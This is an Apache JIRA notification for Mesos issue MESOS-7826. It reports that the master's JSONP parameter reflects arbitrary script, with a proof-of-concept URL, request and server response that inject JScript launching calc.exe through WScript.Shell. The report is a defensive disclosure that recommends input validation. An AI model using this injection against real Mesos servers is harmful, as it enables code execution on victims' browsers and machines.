[jira] [Updated] (MESOS-7826) XSS in JSONP parameter

["Gilbert Song (JIRA)" <ji...@apache.org>]

     [ https://issues.apache.org/jira/browse/MESOS-7826?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]

Gilbert Song updated MESOS-7826:
--------------------------------
    Issue Type: Improvement  (was: Bug)

> XSS in JSONP parameter
> ----------------------
>
>                 Key: MESOS-7826
>                 URL: https://issues.apache.org/jira/browse/MESOS-7826
>             Project: Mesos
>          Issue Type: Improvement
>          Components: json api
>         Environment: Running as part of DC/OS in a docker container.
>            Reporter: Vincent Ruijter
>            Priority: Critical
>
> It is possible to inject arbitrary content into a server request. Take into account the following url: https://xxx.xxx.com/mesos/master/state?jsonp=var+oShell+%3d+new+ActiveXObject("WScript.Shell")%3boShell.Run("calc.exe",+1)%3b
> This will result in the following request:
> {code:html}
> GET /mesos/master/state?jsonp=var+oShell+%3d+new+ActiveXObject("WScript.Shell")%3boShell.Run("calc.exe",+1)%3b HTTP/1.1
> Host: xxx.xxx.com
> User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0
> Accept: */*
> Accept-Language: en-US,en;q=0.5
> [...SNIP...]
> {code}
> The server response:
> {code:html}
> HTTP/1.1 200 OK
> Server: openresty/1.9.15.1
> Date: Tue, 25 Jul 2017 09:04:31 GMT
> Content-Type: text/javascript
> Content-Length: 1411637
> Connection: close
> var oShell = new ActiveXObject("WScript.Shell");oShell.Run("calc.exe", 1);({"version":"1.2.1","git_sha":"f219b2e4f6265c0b6c4d826a390b67fe9d5e1097","build_date":"2017-06-01 19:16:40","build_time":149634
> [...SNIP...]
> {code}
> On Internet Explorer this will trigger a file download, and when executing the file (state.js), it will pop-up a calculator. It's my recommendation to apply input validation on this parameter, to prevent abuse.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)